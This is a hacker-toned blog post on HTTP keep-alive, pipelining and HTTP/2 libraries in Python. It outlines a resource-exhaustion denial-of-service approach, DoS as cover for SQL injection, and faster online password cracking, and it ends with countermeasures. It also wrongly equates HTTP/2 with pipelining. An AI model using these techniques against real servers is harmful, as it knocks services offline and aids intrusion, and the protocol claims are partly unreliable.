The newer HTTP/2 protocol uses the same idea and takes it further to allow multiple concurrent requests/responses to be multiplexed over a single connection.

HTTP 1.0, connections are not considered persistent unless a keep-alive header is included, although there is no official specification for how keepalive operates. It was, in essence, added to an existing protocol. If the client supports keep-alive, it adds an additional header to the request:
Connection: keep-alive
Then, when the server receives this request and generates a response, it also adds a header to the response:
Connection: keep-alive
Following this, the connection is not dropped, but is instead kept open. When the client sends another request, it uses the same connection. This will continue until either the client or the server decides that the conversation is over, and one of them drops the connection.

In HTTP 1.1, all connections are considered persistent unless declared otherwise. The HTTP persistent connections do not use separate keepalive messages, they just allow multiple requests to use a single connection.

If the client does not close the connection when all of the data it needs has been received, the resources needed to keep the connection open on the server will be unavailable for other clients. How much this affects the server's availability and how long the resources are unavailable depend on the server's architecture and configuration.

Yes dear reader I know what are you thinking, how can you the humble hacker, the humble whitehat reader can use this knowledge to bring down your home web server for fun? Well there are good news. 

In Python there are various functions provided for instantiating HTTP keepalive connections within urllib3 library, such as ConnectionPools.

Here is a code chunk to look through:

from urllib3 import HTTPConnectionPool
[...omitted...]
urllib3.connectionpool.make_headers(keep_alive=None, accept_encoding=None, user_agent=None, basic_auth=None)¶
[...omitted...]

Parameters:
  • keep_alive – If True, adds ‘connection: keep-alive’ header.
  • accept_encoding – Can be a boolean, list, or string. True translates to ‘gzip,deflate’. List will get joined by comma. String will be used as provided.
  • user_agent – String representing the user-agent you want, such as “python-urllib3/0.6”
  • basic_auth – Colon-separated username:password string for ‘authorization: basic ...’ auth header.
Note: If you are a proxy person, you can use the Match and Replace functionality on Burp Pro Suite to add or replace a the keepalive header. Bur then, your client (aka. the browser would have to know how to handle the received content). Better to write a Python template to handle the interaction.

HTTP Pipelining

HTTP pipelining is a technique in which multiple HTTP requests are sent on a single TCP (transmission control protocol) connection without waiting for the corresponding responses. The technique was superseded by multiplexing via HTTP/2, which is supported by most modern browsers.

See following diagram for pipeline :



HTTP pipelining requires both the client and the server to support it. HTTP/1.1 conforming servers are required to support pipelining (Pipelining was introduced in HTTP/1.1 and was not present in HTTP/1.0). This does not mean that servers are required to pipeline responses, but that they are required not to fail if a client chooses to pipeline requests. Interesting behavior!!!!!!!!!

Note: Most of the servers execute requests from pipelining clients in the same fashion they would from non-pipelining clients. They don’t try to optimize it.



Again, yes dear reader I know what are you thinking, how can you the humble blackhat hacker, the humble hacktivist reader can use this knowledge to bring down your home web server for fun? Well there are more good news. 



Some Python frameworks do support HTTP/2 aka HTTP pipelining , Mouxaxaxa. As of late 2017 there are two Python frameworks that directly support HTTP/2, namely Twisted and Quart with only the latter supporting server-push.

Quart can be installed via pipenv or pip:

$ pipenv install quart
$ pip install quart

This requires Python 3.7.0 or higher (see python version support for reasoning).

A minimal Quart example is:

from quart import make_response, Quart, render_template, url_for

app = Quart(__name__)

@app.route('/')
async def index():
    result = await render_template('index.html')
    response = await make_response(result)
    response.push_promises.update([
        url_for('static', filename='css/bootstrap.min.css'),
        url_for('static', filename='js/bootstrap.min.js'),
        url_for('static', filename='js/jquery.min.js'),
    ])
    return response

if __name__ == '__main__':
    app.run(
        host='localhost', 
        port=5000, 
        certfile='cert.pem', 
        keyfile='key.pem',
    )

Also another library that supports Python HTTP/2 connectivity is hyper. hyper is a Python HTTP/2 library, as well as a very serviceable HTTP/1.1 library.

To begin, you will need to install hyper. This can be done like so:


$ pip install hyper

From the terminal you can launch a request by typing:

>>> from hyper import HTTPConnection
>>> c = HTTPConnection('http2bin.org')
>>> c.request('GET', '/')
1
>>> resp = c.get_response()

Used in this way, hyper behaves exactly like http.client classic Python client. You can make sequential requests using the exact same API you’re accustomed to. The only difference is that HTTPConnection.request() may return a value, unlike the equivalent http.client function. If present, the return value is the HTTP/2 stream identifier.

In HTTP/2, connections are divided into multiple streams (due to pipelining). Each stream carries a single request-response pair. You may start multiple requests before reading the response from any of them, and switch between them using their stream IDs.

Note: Be warned: hyper is in a very early alpha. You will encounter bugs when using it. If you use the library, provide feedback about potential issues and send to the creator.

Making Sense

By dramatically speeding up the number of payloads per second send to the server we increase the chance to crash the system for the following reasons:
  • Multiple HTTP/2 connections sending requests such as the following would cause significant  resource allocation, both in the server and the database:
    • File upload requests, with large files to be uploaded.
    • File download requests, with large files to be downloaded.
    • POST and GET requests containing exotic Unicode Encoding e.g. %2e%2e%5c etc.
    • POST and GET requests while performing intelligent fuzzing.  
  • Enforcement of single  SSL/TLS Handshake: 
    • Not much to be said here. Simply enforce a single TLS handshake if the malicious payloads are going to consume more resources than the handshake it self. This will cause the server to consume resources.
Note: Such type of an attack can also be used to as a diversion to hide other type of attacks, such as SQLi etc.

The diagram below demonstrates where potentially system is going to crash first:



Other Uses of The This Tech

We can use this knowledge to perform the following tasks:
  • Optimize Web App Scans
  • Optimize directory enumeration
  • Optimize online password cracking on Web Forms
  • Optimize manual SQLi attacks 


Useful Tools 

There are some tools out there that make use some of the principles mentioned here:
  • Turbo Intruder - https://github.com/PortSwigger/turbo-intruder - Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results. It's intended to complement Burp Intruder by handling attacks that require exceptional speed, duration, or complexity.
  • Skipfish - https://code.google.com/archive/p/skipfish/ - Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes.
Countermeasures

Things to do to avoid this type of attacks are:
  • Firewall HTTP state filtering rules 
  • Firewall HTTPS state filtering rules  
  • Firewall HTTP/2 blockage - Although not recommended
  • WAF that checks the following things - 
    • User Agent - Check for spoofing the agent 
    • Request Parameters - Check for fuzzing 
    • Request size check.
That is it folks have fun.......



References: 
  1.  https://stackoverflow.com/questions/25239650/python-requests-speed-up-using-keep-alive
  2.  https://en.wikipedia.org/wiki/Low_Orbit_Ion_Cannon
  3.  https://www.cloudflare.com/learning/ddos/famous-ddos-attacks/
  4. https://en.wikipedia.org/wiki/HTTP_persistent_connection 
  5. https://2.python-requests.org/en/master/user/advanced/#keep-alive
  6. https://urllib3.readthedocs.io/en/1.0.2/pools.html.
  7. https://stackoverflow.com/questions/19312545/python-http-client-with-request-pipelining
  8. https://www.freecodecamp.org/news/million-requests-per-second-with-python-95c137af319/
  9. https://www.python.org/downloads/
  10. https://txzone.net/2010/02/python-and-http-pipelining/
  11. https://gitlab.com/pgjones/quart?source=post_page---------------------------
  12. https://gitlab.com/pgjones/quart/blob/master/docs/http2_tutorial.rst
  13. https://hyper.readthedocs.io/en/latest/

AppSec Review for AI-Generated Code

Grepping the Robot: AppSec Review for AI-Generated Code APPSEC CODE REVIEW AI CODE Half the code shipping to production in 2026 has a...